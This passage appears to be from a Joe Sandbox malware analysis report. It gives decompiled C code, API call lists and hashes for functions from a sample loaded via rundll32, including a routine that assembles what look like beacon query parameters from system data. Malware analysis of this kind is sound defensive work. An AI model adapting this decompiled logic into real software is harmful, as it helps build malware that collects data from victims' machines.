                                      0x04de84f9
                                      0x04de8577
                                      0x04de8577
                                      0x04de84fb
                                      0x04de84fb
                                      0x04de84fb
                                      0x04de8579
                                      0x04de857b
                                      0x04de865c
                                      0x04de865c
                                      0x00000000
                                      0x04de8581
                                      0x04de8581
                                      0x04de8588
                                      0x00000000
                                      0x00000000
                                      0x04de858e
                                      0x04de8592
                                      0x04de85ee
                                      0x04de85f0
                                      0x04de85f8
                                      0x04de85fa
                                      0x04de85fc
                                      0x00000000
                                      0x00000000
                                      0x04de85fe
                                      0x04de8604
                                      0x04de8606
                                      0x04de8608
                                      0x04de861d
                                      0x04de861d
                                      0x04de861f
                                      0x04de864e
                                      0x04de8655
                                      0x00000000
                                      0x04de8655
                                      0x04de8623
                                      0x04de8624
                                      0x04de8626
                                      0x04de8628
                                      0x04de8628
                                      0x04de862a
                                      0x04de862c
                                      0x04de862e
                                      0x04de8642
                                      0x04de8642
                                      0x04de8645
                                      0x04de8647
                                      0x04de8647
                                      0x04de8648
                                      0x04de8648
                                      0x00000000
                                      0x04de8630
                                      0x04de8630
                                      0x04de8630
                                      0x04de8639
                                      0x04de863a
                                      0x04de863c
                                      0x04de863e
                                      0x04de863e
                                      0x00000000
                                      0x04de8630
                                      0x04de862e
                                      0x04de860a
                                      0x04de8611
                                      0x04de8611
                                      0x04de8613
                                      0x00000000
                                      0x00000000
                                      0x04de8615
                                      0x04de8616
                                      0x04de8619
                                      0x04de861b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de861b
                                      0x00000000
                                      0x04de8611
                                      0x04de8594
                                      0x04de8597
                                      0x04de859c
                                      0x00000000
                                      0x00000000
                                      0x04de85a5
                                      0x04de85a7
                                      0x04de85ad
                                      0x00000000
                                      0x00000000
                                      0x04de85b3
                                      0x04de85b9
                                      0x00000000
                                      0x00000000
                                      0x04de85bf
                                      0x04de85c1
                                      0x04de85ca
                                      0x04de85ce
                                      0x00000000
                                      0x00000000
                                      0x04de85d4
                                      0x04de85d7
                                      0x04de85d9
                                      0x00000000
                                      0x00000000
                                      0x04de85e0
                                      0x04de85e2
                                      0x00000000
                                      0x00000000
                                      0x04de85e4
                                      0x04de85e8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de85e8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de84d3
                                      0x04de84d3
                                      0x04de84d3
                                      0x04de84da
                                      0x00000000
                                      0x00000000
                                      0x04de84dc
                                      0x04de84dd
                                      0x04de84df
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de84df
                                      0x04de8507
                                      0x04de8509
                                      0x00000000
                                      0x00000000
                                      0x04de8519
                                      0x04de851b
                                      0x04de851d
                                      0x00000000
                                      0x00000000
                                      0x04de8523
                                      0x04de852a
                                      0x04de8556
                                      0x04de8556
                                      0x04de8558
                                      0x04de855a
                                      0x04de856e
                                      0x04de8570
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de855c
                                      0x04de855c
                                      0x04de855c
                                      0x04de8565
                                      0x04de8566
                                      0x04de8568
                                      0x04de856a
                                      0x04de856a
                                      0x00000000
                                      0x04de855c
                                      0x04de852c
                                      0x04de852c
                                      0x04de852f
                                      0x04de8531
                                      0x04de8543
                                      0x04de8543
                                      0x04de8546
                                      0x04de8548
                                      0x04de8548
                                      0x04de8549
                                      0x04de8549
                                      0x04de854f
                                      0x04de854f
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de8533
                                      0x04de8533
                                      0x04de8533
                                      0x04de853a
                                      0x00000000
                                      0x00000000
                                      0x04de853c
                                      0x04de853c
                                      0x04de853d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de853d
                                      0x04de853f
                                      0x04de8541
                                      0x04de8554
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de8554
                                      0x00000000
                                      0x04de8541
                                      0x04de84b3
                                      0x04de84b6
                                      0x04de84b9
                                      0x00000000
                                      0x00000000
                                      0x04de84bb
                                      0x04de84bd
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de84bd
                                      0x04de8482
                                      0x04de8484
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                      • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 04DE84F2
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: MemoryQueryVirtual
                                      • String ID:
                                      • API String ID: 2850889275-0
                                      • Opcode ID: ccc76899bf0da1422e0e1fa5750a46eae4db21750d98761c742c0a4351bd1fbe
                                      • Instruction ID: bf6731b11c8b4763a1bef1eceb0400982026ac3efff4e7fbaaa4a8445c05dd9f
                                      • Opcode Fuzzy Hash: ccc76899bf0da1422e0e1fa5750a46eae4db21750d98761c742c0a4351bd1fbe
                                      • Instruction Fuzzy Hash: 9961B030B00612DFDB29FF6BC89467973A2FB85354B24886DF846CB294EB35F941A750
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE821C Relevance: .1, Instructions: 77COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 71%
                                      			E04DE821C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E04DE8387(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E04DE8441(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E04DE832C(_t55, _t66);
										_t89 = _t66 + 0x10;
										E04DE8387(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E04DE8423(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                      0x04de8220
                                      0x04de8221
                                      0x04de8222
                                      0x04de8225
                                      0x04de8227
                                      0x04de822a
                                      0x04de822b
                                      0x04de822d
                                      0x04de822e
                                      0x04de822f
                                      0x04de8232
                                      0x04de823c
                                      0x04de82ed
                                      0x04de82f4
                                      0x04de82fd
                                      0x04de8242
                                      0x04de8242
                                      0x04de8248
                                      0x04de824e
                                      0x04de8251
                                      0x04de8254
                                      0x04de8258
                                      0x04de825d
                                      0x04de8262
                                      0x04de82e2
                                      0x00000000
                                      0x04de8264
                                      0x04de8264
                                      0x04de8270
                                      0x04de8272
                                      0x04de82cd
                                      0x04de82cd
                                      0x04de82d3
                                      0x00000000
                                      0x04de8274
                                      0x04de8283
                                      0x04de8285
                                      0x04de8286
                                      0x04de8287
                                      0x04de828a
                                      0x04de828a
                                      0x04de828c
                                      0x00000000
                                      0x04de828e
                                      0x04de828e
                                      0x04de82d8
                                      0x04de8290
                                      0x04de8290
                                      0x04de8294
                                      0x04de829c
                                      0x04de82a1
                                      0x04de82a6
                                      0x04de82b2
                                      0x04de82ba
                                      0x04de82c1
                                      0x04de82c7
                                      0x04de82cb
                                      0x00000000
                                      0x04de82cb
                                      0x04de828e
                                      0x04de828c
                                      0x00000000
                                      0x04de8272
                                      0x04de82e6
                                      0x04de82e6
                                      0x04de82e6
                                      0x04de8262
                                      0x04de8302
                                      0x04de8309

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                      • Instruction ID: 47758ee462601e36381f70212b7f66e1da15ffc57eb1865f76cd7e1acd27ed98
                                      • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                      • Instruction Fuzzy Hash: BF21C572A006049FDB11FF69C8C09BBBBA5FF45320B498168E955DB246E730F915DBE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE59E2 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 255memorystringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 75%
                                      			E04DE59E2(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, void* _a20) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				void* _t77;
				void* _t79;
				void* _t82;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				void* _t98;
				intOrPtr _t104;
				signed int _t108;
				char** _t110;
				int _t113;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				int _t134;
				intOrPtr _t136;
				int _t139;
				CHAR* _t140;
				intOrPtr _t141;
				void* _t142;
				void* _t151;
				int _t152;
				void* _t153;
				intOrPtr _t154;
				void* _t156;
				long _t160;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr* _t165;
				void* _t166;
				void* _t168;

				_t151 = __edx;
				_t142 = __ecx;
				_t63 = __eax;
				_v8 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x4dea018; // 0x258be91c
				asm("bswap eax");
				_t65 =  *0x4dea014; // 0x3a87c8cd
				_t140 = _a20;
				asm("bswap eax");
				_t66 =  *0x4dea010; // 0xd8d2f808
				asm("bswap eax");
				_t67 =  *0x4dea00c; // 0x62819102
				asm("bswap eax");
				_t68 =  *0x4dea348; // 0x6bd5a8
				_t3 = _t68 + 0x4deb633; // 0x74666f73
				_t152 = wsprintfA(_t140, _t3, 3, 0x3d173, _t67, _t66, _t65, _t64,  *0x4dea02c,  *0x4dea004, _t63);
				_t71 = E04DE3F1E();
				_t72 =  *0x4dea348; // 0x6bd5a8
				_t4 = _t72 + 0x4deb673; // 0x74707526
				_t75 = wsprintfA(_t152 + _t140, _t4, _t71);
				_t168 = _t166 + 0x38;
				_t153 = _t152 + _t75;
				if(_a8 != 0) {
					_t136 =  *0x4dea348; // 0x6bd5a8
					_t8 = _t136 + 0x4deb67e; // 0x732526
					_t139 = wsprintfA(_t153 + _t140, _t8, _a8);
					_t168 = _t168 + 0xc;
					_t153 = _t153 + _t139;
				}
				_t76 = E04DE1567(_t142);
				_t141 = __imp__;
				_a8 = _t76;
				if(_t76 != 0) {
					_t130 =  *0x4dea348; // 0x6bd5a8
					_t11 = _t130 + 0x4deb8d4; // 0x736e6426
					_t134 = wsprintfA(_a20 + _t153, _t11, _t76);
					_t168 = _t168 + 0xc;
					_t153 = _t153 + _t134;
					HeapFree( *0x4dea2d8, 0, _a8);
				}
				_t77 = E04DE3268();
				_a8 = _t77;
				if(_t77 != 0) {
					_t125 =  *0x4dea348; // 0x6bd5a8
					_t15 = _t125 + 0x4deb8dc; // 0x6f687726
					wsprintfA(_t153 + _a20, _t15, _t77);
					_t168 = _t168 + 0xc;
					HeapFree( *0x4dea2d8, 0, _a8);
				}
				_t154 =  *0x4dea3cc; // 0x54a95b0
				_t79 = E04DE5D1C(0x4dea00a, _t154 + 4);
				_t160 = 0;
				_v16 = _t79;
				if(_t79 == 0) {
					L28:
					HeapFree( *0x4dea2d8, _t160, _a20);
					return _v8;
				} else {
					_t82 = RtlAllocateHeap( *0x4dea2d8, 0, 0x800);
					_a8 = _t82;
					if(_t82 == 0) {
						L27:
						HeapFree( *0x4dea2d8, _t160, _v16);
						goto L28;
					}
					E04DE3950(GetTickCount());
					_t86 =  *0x4dea3cc; // 0x54a95b0
					__imp__(_t86 + 0x40);
					asm("lock xadd [eax], ecx");
					_t90 =  *0x4dea3cc; // 0x54a95b0
					__imp__(_t90 + 0x40);
					_t92 =  *0x4dea3cc; // 0x54a95b0
					_t156 = E04DE3739(1, _t151, _a20,  *_t92);
					_v24 = _t156;
					asm("lock xadd [eax], ecx");
					if(_t156 == 0) {
						L26:
						HeapFree( *0x4dea2d8, _t160, _a8);
						goto L27;
					}
					StrTrimA(_t156, 0x4de928c);
					_push(_t156);
					_t98 = E04DE3970();
					_v12 = _t98;
					if(_t98 == 0) {
						L25:
						HeapFree( *0x4dea2d8, _t160, _t156);
						goto L26;
					}
					_t161 = __imp__;
					 *_t161(_t156, _a4);
					 *_t161(_a8, _v16);
					_t162 = __imp__;
					 *_t162(_a8, _v12);
					_t104 = E04DE4208( *_t162(_a8, _t156), _a8);
					_a4 = _t104;
					if(_t104 == 0) {
						_v8 = 8;
						L23:
						E04DE3F62();
						L24:
						HeapFree( *0x4dea2d8, 0, _v12);
						_t160 = 0;
						goto L25;
					}
					_t108 = E04DE388D(_t141, 0xffffffffffffffff, _t156,  &_v20);
					_v8 = _t108;
					if(_t108 == 0) {
						_t165 = _v20;
						_v8 = E04DE3394(_t165, _a4, _a12, _a16);
						_t116 =  *((intOrPtr*)(_t165 + 8));
						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
						_t118 =  *((intOrPtr*)(_t165 + 8));
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						_t120 =  *((intOrPtr*)(_t165 + 4));
						 *((intOrPtr*)( *_t120 + 8))(_t120);
						_t122 =  *_t165;
						 *((intOrPtr*)( *_t122 + 8))(_t122);
						E04DE4C73(_t165);
					}
					if(_v8 != 0x10d2) {
						L18:
						if(_v8 == 0) {
							_t110 = _a12;
							if(_t110 != 0) {
								_t157 =  *_t110;
								_t163 =  *_a16;
								wcstombs( *_t110,  *_t110,  *_a16);
								_t113 = E04DE43A5(_t157, _t157, _t163 >> 1);
								_t156 = _v24;
								 *_a16 = _t113;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E04DE4C73(_a4);
							if(_v8 == 0 || _v8 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L18;
					}
				}
			}






















































                                      0x04de59e2
                                      0x04de59e2
                                      0x04de59e2
                                      0x04de59eb
                                      0x04de59f4
                                      0x04de59f6
                                      0x04de59f6
                                      0x04de5a03
                                      0x04de5a0e
                                      0x04de5a11
                                      0x04de5a16
                                      0x04de5a1f
                                      0x04de5a22
                                      0x04de5a27
                                      0x04de5a2a
                                      0x04de5a2f
                                      0x04de5a32
                                      0x04de5a3e
                                      0x04de5a4b
                                      0x04de5a4d
                                      0x04de5a53
                                      0x04de5a58
                                      0x04de5a63
                                      0x04de5a65
                                      0x04de5a68
                                      0x04de5a6e
                                      0x04de5a70
                                      0x04de5a78
                                      0x04de5a83
                                      0x04de5a85
                                      0x04de5a88
                                      0x04de5a88
                                      0x04de5a8a
                                      0x04de5a8f
                                      0x04de5a95
                                      0x04de5a9a
                                      0x04de5a9d
                                      0x04de5aa2
                                      0x04de5aaf
                                      0x04de5ab1
                                      0x04de5ab7
                                      0x04de5ac1
                                      0x04de5ac1
                                      0x04de5ac3
                                      0x04de5ac8
                                      0x04de5acd
                                      0x04de5ad0
                                      0x04de5ad5
                                      0x04de5ae2
                                      0x04de5ae4
                                      0x04de5af2
                                      0x04de5af2
                                      0x04de5af4
                                      0x04de5b02
                                      0x04de5b07
                                      0x04de5b09
                                      0x04de5b0e
                                      0x04de5ccf
                                      0x04de5cd9
                                      0x04de5ce2
                                      0x04de5b14
                                      0x04de5b20
                                      0x04de5b26
                                      0x04de5b2b
                                      0x04de5cc3
                                      0x04de5ccd
                                      0x00000000
                                      0x04de5ccd
                                      0x04de5b37
                                      0x04de5b3c
                                      0x04de5b45
                                      0x04de5b56
                                      0x04de5b5a
                                      0x04de5b63
                                      0x04de5b69
                                      0x04de5b78
                                      0x04de5b7f
                                      0x04de5b88
                                      0x04de5b8e
                                      0x04de5cb7
                                      0x04de5cc1
                                      0x00000000
                                      0x04de5cc1
                                      0x04de5b9a
                                      0x04de5ba0
                                      0x04de5ba1
                                      0x04de5ba6
                                      0x04de5bab
                                      0x04de5cad
                                      0x04de5cb5
                                      0x00000000
                                      0x04de5cb5
                                      0x04de5bb4
                                      0x04de5bbb
                                      0x04de5bc3
                                      0x04de5bc8
                                      0x04de5bd1
                                      0x04de5bdc
                                      0x04de5be1
                                      0x04de5be6
                                      0x04de5ce5
                                      0x04de5c99
                                      0x04de5c99
                                      0x04de5c9e
                                      0x04de5ca9
                                      0x04de5cab
                                      0x00000000
                                      0x04de5cab
                                      0x04de5bf0
                                      0x04de5bf5
                                      0x04de5bfa
                                      0x04de5bff
                                      0x04de5c0f
                                      0x04de5c12
                                      0x04de5c18
                                      0x04de5c1e
                                      0x04de5c24
                                      0x04de5c27
                                      0x04de5c2d
                                      0x04de5c30
                                      0x04de5c35
                                      0x04de5c39
                                      0x04de5c39
                                      0x04de5c45
                                      0x04de5c51
                                      0x04de5c55
                                      0x04de5c57
                                      0x04de5c5c
                                      0x04de5c5e
                                      0x04de5c63
                                      0x04de5c68
                                      0x04de5c75
                                      0x04de5c7d
                                      0x04de5c80
                                      0x04de5c80
                                      0x04de5c5c
                                      0x00000000
                                      0x04de5c47
                                      0x04de5c4b
                                      0x04de5c82
                                      0x04de5c85
                                      0x04de5c8e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de5c8e
                                      0x04de5c4d
                                      0x00000000
                                      0x04de5c4d
                                      0x04de5c45

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 04DE59F6
                                      • wsprintfA.USER32 ref: 04DE5A46
                                      • wsprintfA.USER32 ref: 04DE5A63
                                      • wsprintfA.USER32 ref: 04DE5A83
                                      • wsprintfA.USER32 ref: 04DE5AAF
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE5AC1
                                      • wsprintfA.USER32 ref: 04DE5AE2
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE5AF2
                                      • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04DE5B20
                                      • GetTickCount.KERNEL32 ref: 04DE5B31
                                      • RtlEnterCriticalSection.NTDLL(054A9570), ref: 04DE5B45
                                      • RtlLeaveCriticalSection.NTDLL(054A9570), ref: 04DE5B63
                                        • Part of subcall function 04DE3739: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,76D8C740,?,?,04DE653D,?,054A95B0), ref: 04DE3764
                                        • Part of subcall function 04DE3739: lstrlen.KERNEL32(?,?,?,04DE653D,?,054A95B0), ref: 04DE376C
                                        • Part of subcall function 04DE3739: strcpy.NTDLL ref: 04DE3783
                                        • Part of subcall function 04DE3739: lstrcat.KERNEL32(00000000,?), ref: 04DE378E
                                        • Part of subcall function 04DE3739: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04DE653D,?,054A95B0), ref: 04DE37AB
                                      • StrTrimA.SHLWAPI(00000000,04DE928C,?,054A95B0), ref: 04DE5B9A
                                        • Part of subcall function 04DE3970: lstrlen.KERNEL32(054A9B90,00000000,00000000,76D8C740,04DE6568,00000000), ref: 04DE3980
                                        • Part of subcall function 04DE3970: lstrlen.KERNEL32(?), ref: 04DE3988
                                        • Part of subcall function 04DE3970: lstrcpy.KERNEL32(00000000,054A9B90), ref: 04DE399C
                                        • Part of subcall function 04DE3970: lstrcat.KERNEL32(00000000,?), ref: 04DE39A7
                                      • lstrcpy.KERNEL32(00000000,?), ref: 04DE5BBB
                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 04DE5BC3
                                      • lstrcat.KERNEL32(00000000,?), ref: 04DE5BD1
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 04DE5BD7
                                        • Part of subcall function 04DE4208: lstrlen.KERNEL32(?,00000000,054A9DA0,00000000,04DE2263,054A9FC3,69B25F44,?,?,?,?,69B25F44,00000005,04DEA00C,4D283A53,?), ref: 04DE420F
                                        • Part of subcall function 04DE4208: mbstowcs.NTDLL ref: 04DE4238
                                        • Part of subcall function 04DE4208: memset.NTDLL ref: 04DE424A
                                      • wcstombs.NTDLL ref: 04DE5C68
                                        • Part of subcall function 04DE3394: SysAllocString.OLEAUT32(?), ref: 04DE33CF
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      • HeapFree.KERNEL32(00000000,?,00000000), ref: 04DE5CA9
                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04DE5CB5
                                      • HeapFree.KERNEL32(00000000,00000000,?,054A95B0), ref: 04DE5CC1
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE5CCD
                                      • HeapFree.KERNEL32(00000000,?), ref: 04DE5CD9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Heap$Free$lstrlenwsprintf$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                      • String ID: FNwPq
                                      • API String ID: 2543559236-3591455833
                                      • Opcode ID: 2c1f28909146b95a94ffad4ef171234d8c6a73e9e1342a01f340ba778be0be9e
                                      • Instruction ID: 6af641025114863f826a1c7ac5bbc60ffa2dc6009f62893c23c356e9a34f9405
                                      • Opcode Fuzzy Hash: 2c1f28909146b95a94ffad4ef171234d8c6a73e9e1342a01f340ba778be0be9e
                                      • Instruction Fuzzy Hash: D0914971601219AFDB11FFA6DC68AAA3BA8FB48354F148055F8089B320D735ED51DB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE26E7 Relevance: 16.6, APIs: 11, Instructions: 145stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 55%
                                      			E04DE26E7(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				WCHAR* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				WCHAR* _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				WCHAR* _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				WCHAR* _t125;

				_t58 =  *0x4dea3dc; // 0x54a9c48
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E04DE59CA();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E04DE59CA();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E04DE4B8D(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E04DE4B8D(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E04DE4480(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x4de918c;
						}
						_t70 = E04DE22D6(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E04DE4DF6(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x4dea348; // 0x6bd5a8
								_t28 = _t105 + 0x4debb08; // 0x530025
								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E04DE4480(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x4de9190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E04DE4DF6(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E04DE4C73(_v24);
								} else {
									_t92 =  *0x4dea348; // 0x6bd5a8
									_t44 = _t92 + 0x4debc80; // 0x73006d
									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E04DE4C73(_v8);
						}
						E04DE4C73(_v12);
					}
					E04DE4C73(_v16);
				}
				return _v28;
			}


































                                      0x04de26ed
                                      0x04de26f5
                                      0x04de26f8
                                      0x04de2705
                                      0x04de2708
                                      0x04de270f
                                      0x04de2716
                                      0x04de2719
                                      0x04de2726
                                      0x04de2729
                                      0x04de272c
                                      0x04de2731
                                      0x04de2736
                                      0x04de273e
                                      0x04de2743
                                      0x04de2748
                                      0x04de274e
                                      0x04de2752
                                      0x04de275b
                                      0x04de275f
                                      0x04de2761
                                      0x04de2761
                                      0x04de2769
                                      0x04de276e
                                      0x04de2773
                                      0x04de2779
                                      0x04de2780
                                      0x04de2791
                                      0x04de2798
                                      0x04de27aa
                                      0x04de27af
                                      0x04de27b4
                                      0x04de27bd
                                      0x04de27cf
                                      0x04de27e5
                                      0x04de27ea
                                      0x04de27ee
                                      0x04de27f2
                                      0x04de27f7
                                      0x04de27fc
                                      0x04de27fe
                                      0x04de27fe
                                      0x04de2808
                                      0x04de2811
                                      0x04de2818
                                      0x04de2834
                                      0x04de2838
                                      0x04de2871
                                      0x04de283a
                                      0x04de283d
                                      0x04de2845
                                      0x04de2856
                                      0x04de285e
                                      0x04de2866
                                      0x04de286a
                                      0x04de286a
                                      0x04de2838
                                      0x04de2879
                                      0x04de2879
                                      0x04de2881
                                      0x04de2881
                                      0x04de2889
                                      0x04de2889
                                      0x04de2895

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 04DE26FF
                                      • lstrlen.KERNEL32(00000000,00000005), ref: 04DE2780
                                      • lstrlen.KERNEL32(?), ref: 04DE2791
                                      • lstrlen.KERNEL32(00000000), ref: 04DE2798
